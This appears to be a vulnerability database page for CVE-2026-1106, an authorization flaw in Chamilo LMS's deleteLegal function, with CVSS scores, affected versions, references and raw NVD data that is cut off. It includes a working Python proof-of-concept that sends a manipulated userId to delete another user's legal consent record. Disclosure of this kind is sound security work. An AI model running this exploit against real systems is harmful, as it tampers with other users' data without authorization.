CVE-2026-1106

Description

A security flaw has been discovered in Chamilo LMS up to 2.0.0 Beta 1. This issue affects the function deleteLegal of the file src/CoreBundle/Controller/SocialController.php of the component Legal Consent Handler. Performing a manipulation of the argument userId results in improper authorization. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha3:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha4:*:*:*:*:*:* - VULNERABLE

Chamilo LMS < 2.0.0 Beta 1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-1106 PoC - Chamilo LMS deleteLegal IDOR Vulnerability
Note: This is a proof-of-concept for authorized security testing only
"""

import requests
import sys

def exploit_delete_legal(target_url, session_cookie, attacker_user_id, target_user_id):
    """
    Exploit the IDOR vulnerability in Chamilo LMS deleteLegal function
    
    Args:
        target_url: Base URL of the Chamilo LMS instance
        session_cookie: Valid session cookie for authenticated user
        attacker_user_id: Attacker's own user ID
        target_user_id: Victim's user ID to delete legal consent for
    """
    # The vulnerable endpoint
    endpoint = f"{target_url}/Social/deleteLegal"
    
    # Normal request (delete own legal consent)
    normal_params = {
        "userId": attacker_user_id
    }
    
    # Malicious request (delete victim's legal consent - IDOR)
    malicious_params = {
        "userId": target_user_id  # Manipulated to target another user
    }
    
    headers = {
        "Cookie": f"{session_cookie}",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Attacker User ID: {attacker_user_id}")
    print(f"[*] Target User ID: {target_user_id}")
    
    # Send malicious request
    try:
        response = requests.post(endpoint, data=malicious_params, headers=headers)
        
        if response.status_code == 200:
            print("[+] Request sent successfully")
            print(f"[*] Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: {sys.argv[0]} <target_url> <session_cookie> <attacker_id> <target_id>")
        sys.exit(1)
    
    exploit_delete_legal(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1106
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1106
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1106/
[4] VulDB https://vuldb.com/cve/CVE-2026-1106
[5] https://note-hxlab.wetolink.com/share/w92t1Q0a74Gj
[6] https://vuldb.com/?ctiid.341698
[7] https://vuldb.com/?id.341698
[8] https://vuldb.com/?submit.731510

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1106", "sourceIdentifier": "[email protected]", "published": "2026-01-18T01:15:51.023", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Chamilo LMS up to 2.0.0 Beta 1. This issue affects the function deleteLegal of the file src/CoreBundle/Controller/SocialController.php of the component Legal Consent Handler. Performing a manipulation of the argument userId results in improper authorization. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una falla de seguridad ha sido descubierta en Chamilo LMS hasta la versión 2.0.0 Beta 1. Este problema afecta la función deleteLegal del archivo src/CoreBundle/Controller/SocialController.PHP del componente Legal Consent Handler. Realizar una manipulación del argumento userId resulta en una autorización indebida. El ataque es posible de ser llevado a cabo de forma remota. El exploit ha sido publicado al público y puede ser utilizado para ataques. Se contactó al proveedor tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "baseScore": 5.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.0", "matchCriteriaId": "B89E53DA-9C45-48F2-A060-FBFDA8E29B6B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "4AF7661F-C1F7-4CAB-BBDF-FC5BF7F5BEB8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "FE56AF71-9D53-42C6-980D-09E1C418ED87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "01195674-9E1A-4C07-B7D3-0F0CC2E6511B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha4:*:*:*:*:*:*", "matchCriteriaId": "BAE63449-5A56-4302-A4BF-F3D19FC96A80"}, {"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:alpha5: ... (truncated)